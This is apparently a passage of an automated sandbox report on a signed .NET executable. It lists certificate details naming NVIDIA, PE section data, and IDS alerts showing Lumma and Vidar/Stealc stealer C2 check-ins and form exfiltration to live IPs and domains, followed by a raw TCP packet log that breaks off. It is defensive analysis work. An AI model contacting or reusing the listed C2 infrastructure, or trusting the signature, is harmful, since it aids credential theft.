                                                                                                                                                      • 13/01/2023 01:00:00 17/01/2026 00:59:59
                                                                                                                                                      Subject Chain
                                                                                                                                                      • CN=NVIDIA Corporation, OU=2-J, O=NVIDIA Corporation, L=Santa Clara, S=California, C=US
                                                                                                                                                      Version:3
                                                                                                                                                      Thumbprint MD5:5F1B6B6C408DB2B4D60BAA489E9A0E5A
                                                                                                                                                      Thumbprint SHA-1:15F760D82C79D22446CC7D4806540BF632B1E104
                                                                                                                                                      Thumbprint SHA-256:28AF76241322F210DA473D9569EFF6F27124C4CA9F43933DA547E8D068B0A95D
                                                                                                                                                      Serial:0997C56CAA59055394D9A9CDB8BEEB56

                                                                                                                                                      Entrypoint Preview

                                                                                                                                                      Instruction
                                                                                                                                                      jmp dword ptr [00402000h]
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      add dword ptr [eax], eax
                                                                                                                                                      sbb byte ptr [eax], al
                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                      sbb byte ptr [eax], al

                                                                                                                                                      Data Directories

                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x63ef80x53.text
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x640000x242.rsrc
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x651780x2628
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x660000xc.reloc
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x63dc00x1c.text
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                      Sections

                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                      .text0x20000x61f540x620006811be74d2db6f6275be1f1b78cd18f7False0.9935925542091837data7.996106599769484IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                      .rsrc0x640000x2420x400de587f26ae0fb3240b210085d083946fFalse0.302734375data3.526286411687027IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                      .reloc0x660000xc0x2000990a108bfe9d4f667dd8680cfd6f1b6False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                      Resources

                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                      RT_MANIFEST0x640580x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041

                                                                                                                                                      Imports

                                                                                                                                                      DLLImport
                                                                                                                                                      mscoree.dll_CorExeMain

                                                                                                                                                      Network Behavior

                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                      2024-10-03T09:16:09.033709+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64972149.12.197.9443TCP
                                                                                                                                                      2024-10-03T09:16:10.269242+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64972249.12.197.9443TCP
                                                                                                                                                      2024-10-03T09:16:11.603749+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64972349.12.197.9443TCP
                                                                                                                                                      2024-10-03T09:16:12.968759+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64972449.12.197.9443TCP
                                                                                                                                                      2024-10-03T09:16:13.666117+02002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.64972449.12.197.9443TCP
                                                                                                                                                      2024-10-03T09:16:13.666323+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config149.12.197.9443192.168.2.649724TCP
                                                                                                                                                      2024-10-03T09:16:14.315886+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64972549.12.197.9443TCP
                                                                                                                                                      2024-10-03T09:16:15.020448+02002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1149.12.197.9443192.168.2.649725TCP
                                                                                                                                                      2024-10-03T09:16:15.778102+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64972649.12.197.9443TCP
                                                                                                                                                      2024-10-03T09:16:16.769528+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64972749.12.197.9443TCP
                                                                                                                                                      2024-10-03T09:16:19.708106+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64972849.12.197.9443TCP
                                                                                                                                                      2024-10-03T09:16:20.784635+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64972949.12.197.9443TCP
                                                                                                                                                      2024-10-03T09:16:21.921444+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64973049.12.197.9443TCP
                                                                                                                                                      2024-10-03T09:16:23.148932+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64973149.12.197.9443TCP
                                                                                                                                                      2024-10-03T09:16:24.833934+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64973249.12.197.9443TCP
                                                                                                                                                      2024-10-03T09:16:26.539409+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64973349.12.197.9443TCP
                                                                                                                                                      2024-10-03T09:16:28.113677+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64973549.12.197.9443TCP
                                                                                                                                                      2024-10-03T09:16:29.539542+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64973649.12.197.9443TCP
                                                                                                                                                      2024-10-03T09:16:30.799417+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64973749.12.197.9443TCP
                                                                                                                                                      2024-10-03T09:16:33.915638+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64973849.12.197.9443TCP
                                                                                                                                                      2024-10-03T09:16:35.365919+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64973949.12.197.9443TCP
                                                                                                                                                      2024-10-03T09:16:36.749671+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64974049.12.197.9443TCP
                                                                                                                                                      2024-10-03T09:16:38.133675+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64974249.12.197.9443TCP
                                                                                                                                                      2024-10-03T09:16:40.196938+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64974349.12.197.9443TCP
                                                                                                                                                      2024-10-03T09:16:42.018642+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64974449.12.197.9443TCP
                                                                                                                                                      2024-10-03T09:16:43.416365+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.649745147.45.44.10480TCP
                                                                                                                                                      2024-10-03T09:16:44.433969+02002056396ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chorusarorp .site)1192.168.2.6539501.1.1.153UDP
                                                                                                                                                      2024-10-03T09:16:44.478276+02002056402ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (questionsmw .store)1192.168.2.6655071.1.1.153UDP
                                                                                                                                                      2024-10-03T09:16:44.699283+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64974649.12.197.9443TCP
                                                                                                                                                      2024-10-03T09:16:44.968580+02002056403ET MALWARE Observed Win32/Lumma Stealer Related Domain (questionsmw .store in TLS SNI)1192.168.2.649747172.67.208.141443TCP
                                                                                                                                                      2024-10-03T09:16:45.424799+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649747172.67.208.141443TCP
                                                                                                                                                      2024-10-03T09:16:45.424799+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649747172.67.208.141443TCP
                                                                                                                                                      2024-10-03T09:16:45.430241+02002056408ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soldiefieop .site)1192.168.2.6530421.1.1.153UDP
                                                                                                                                                      2024-10-03T09:16:45.922882+02002056409ET MALWARE Observed Win32/Lumma Stealer Related Domain (soldiefieop .site in TLS SNI)1192.168.2.649748188.114.96.3443TCP
                                                                                                                                                      2024-10-03T09:16:46.376230+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649748188.114.96.3443TCP
                                                                                                                                                      2024-10-03T09:16:46.376230+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649748188.114.96.3443TCP
                                                                                                                                                      2024-10-03T09:16:46.380069+02002056392ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abnomalrkmu .site)1192.168.2.6581181.1.1.153UDP
                                                                                                                                                      2024-10-03T09:16:46.483948+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64974949.12.197.9443TCP
                                                                                                                                                      2024-10-03T09:16:46.889929+02002056393ET MALWARE Observed Win32/Lumma Stealer Related Domain (abnomalrkmu .site in TLS SNI)1192.168.2.649750172.67.152.190443TCP
                                                                                                                                                      2024-10-03T09:16:47.369794+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649750172.67.152.190443TCP
                                                                                                                                                      2024-10-03T09:16:47.369794+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649750172.67.152.190443TCP
                                                                                                                                                      2024-10-03T09:16:47.376100+02002056410ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (treatynreit .site)1192.168.2.6652261.1.1.153UDP
                                                                                                                                                      2024-10-03T09:16:47.877600+02002056411ET MALWARE Observed Win32/Lumma Stealer Related Domain (treatynreit .site in TLS SNI)1192.168.2.649752104.21.84.18443TCP
                                                                                                                                                      2024-10-03T09:16:48.158642+02002054495ET MALWARE Vidar Stealer Form Exfil1192.168.2.64975145.132.206.25180TCP
                                                                                                                                                      2024-10-03T09:16:49.332498+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649752104.21.84.18443TCP
                                                                                                                                                      2024-10-03T09:16:49.332498+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649752104.21.84.18443TCP
                                                                                                                                                      2024-10-03T09:16:49.334787+02002056406ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (snarlypagowo .site)1192.168.2.6590231.1.1.153UDP
                                                                                                                                                      2024-10-03T09:16:49.860301+02002056407ET MALWARE Observed Win32/Lumma Stealer Related Domain (snarlypagowo .site in TLS SNI)1192.168.2.649753104.21.18.193443TCP
                                                                                                                                                      2024-10-03T09:16:50.284294+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649753104.21.18.193443TCP
                                                                                                                                                      2024-10-03T09:16:50.284294+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649753104.21.18.193443TCP
                                                                                                                                                      2024-10-03T09:16:50.297622+02002056400ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mysterisop .site)1192.168.2.6510961.1.1.153UDP
                                                                                                                                                      2024-10-03T09:16:50.829425+02002056401ET MALWARE Observed Win32/Lumma Stealer Related Domain (mysterisop .site in TLS SNI)1192.168.2.649754104.21.21.3443TCP
                                                                                                                                                      2024-10-03T09:16:51.296261+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649754104.21.21.3443TCP
                                                                                                                                                      2024-10-03T09:16:51.296261+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649754104.21.21.3443TCP
                                                                                                                                                      2024-10-03T09:16:51.323427+02002056394ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (absorptioniw .site)1192.168.2.6599781.1.1.153UDP
                                                                                                                                                      2024-10-03T09:16:51.879056+02002056395ET MALWARE Observed Win32/Lumma Stealer Related Domain (absorptioniw .site in TLS SNI)1192.168.2.649755104.21.17.174443TCP
                                                                                                                                                      2024-10-03T09:16:52.326685+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649755104.21.17.174443TCP
                                                                                                                                                      2024-10-03T09:16:52.326685+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649755104.21.17.174443TCP
                                                                                                                                                      2024-10-03T09:16:54.882156+02002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.649757104.21.16.12443TCP
                                                                                                                                                      2024-10-03T09:16:54.882156+02002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.649757104.21.16.12443TCP

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Oct 3, 2024 09:16:06.265948057 CEST49720443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:06.266027927 CEST44349720104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:06.266117096 CEST49720443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:06.451174974 CEST49720443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:06.451230049 CEST44349720104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:07.114286900 CEST44349720104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:07.114392996 CEST49720443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:07.301367044 CEST49720443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:07.301402092 CEST44349720104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:07.301712990 CEST44349720104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:07.301760912 CEST49720443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:07.385574102 CEST49720443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:07.431401014 CEST44349720104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:07.791101933 CEST44349720104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:07.791130066 CEST44349720104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:07.791229010 CEST44349720104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:07.791304111 CEST49720443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:07.791342020 CEST44349720104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:07.791369915 CEST49720443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:07.791399002 CEST49720443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:07.889776945 CEST44349720104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:07.889799118 CEST44349720104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:07.889873981 CEST49720443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:07.889889956 CEST44349720104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:07.889928102 CEST49720443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:07.895220041 CEST44349720104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:07.895282030 CEST49720443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:07.895293951 CEST44349720104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:07.895314932 CEST44349720104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:07.895332098 CEST49720443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:07.895380020 CEST49720443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:07.895787954 CEST49720443192.168.2.6104.102.49.254
                                                                                                                                                      Oct 3, 2024 09:16:07.895802975 CEST44349720104.102.49.254192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:08.065252066 CEST49721443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:08.065305948 CEST4434972149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:08.065455914 CEST49721443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:08.066098928 CEST49721443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:08.066112995 CEST4434972149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:09.033648014 CEST4434972149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:09.033709049 CEST49721443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:09.038063049 CEST49721443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:09.038078070 CEST4434972149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:09.038391113 CEST4434972149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:09.038440943 CEST49721443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:09.038827896 CEST49721443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:09.083400011 CEST4434972149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:09.539145947 CEST4434972149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:09.539210081 CEST49721443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:09.539225101 CEST4434972149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:09.539237022 CEST4434972149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:09.539284945 CEST49721443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:09.616950035 CEST49721443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:09.616981030 CEST4434972149.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:09.619797945 CEST49722443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:09.619822025 CEST4434972249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:09.619905949 CEST49722443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:09.620157957 CEST49722443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:09.620170116 CEST4434972249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:10.269068003 CEST4434972249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:10.269242048 CEST49722443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:10.270047903 CEST49722443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:10.270060062 CEST4434972249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:10.272062063 CEST49722443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:10.272068024 CEST4434972249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:10.953152895 CEST4434972249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:10.953248978 CEST4434972249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:10.953319073 CEST49722443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:10.953352928 CEST49722443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:10.954130888 CEST49722443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:10.954149961 CEST4434972249.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:10.956398964 CEST49723443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:10.956470013 CEST4434972349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:10.956557035 CEST49723443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:10.957499027 CEST49723443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:10.957534075 CEST4434972349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:11.603545904 CEST4434972349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:11.603749037 CEST49723443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:11.604887962 CEST49723443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:11.604917049 CEST4434972349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:11.606880903 CEST49723443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:11.606894970 CEST4434972349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:12.308521032 CEST4434972349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:12.308576107 CEST4434972349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:12.308689117 CEST49723443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:12.308727980 CEST4434972349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:12.308748960 CEST49723443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:12.308753014 CEST4434972349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:12.308780909 CEST49723443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:12.308814049 CEST49723443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:12.309098005 CEST49723443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:12.309118032 CEST4434972349.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:12.312680006 CEST49724443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:12.312732935 CEST4434972449.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:12.312922955 CEST49724443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:12.313668013 CEST49724443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:12.313694954 CEST4434972449.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:12.968672037 CEST4434972449.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:12.968759060 CEST49724443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:12.969886065 CEST49724443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:12.969893932 CEST4434972449.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:12.972167969 CEST49724443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:12.972176075 CEST4434972449.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:13.666101933 CEST4434972449.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:13.666126013 CEST4434972449.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:13.666201115 CEST4434972449.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:13.666237116 CEST49724443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:13.666237116 CEST49724443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:13.666276932 CEST49724443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:13.666654110 CEST49724443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:13.666676998 CEST4434972449.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:13.668495893 CEST49725443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:13.668545961 CEST4434972549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:13.668628931 CEST49725443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:13.669312000 CEST49725443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:13.669327974 CEST4434972549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:14.315733910 CEST4434972549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:14.315886021 CEST49725443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:14.316838026 CEST49725443192.168.2.649.12.197.9
                                                                                                                                                      Oct 3, 2024 09:16:14.316848993 CEST4434972549.12.197.9192.168.2.6
                                                                                                                                                      Oct 3, 2024 09:16:14.319140911 CEST49725443192.168.2.649.12.197.9
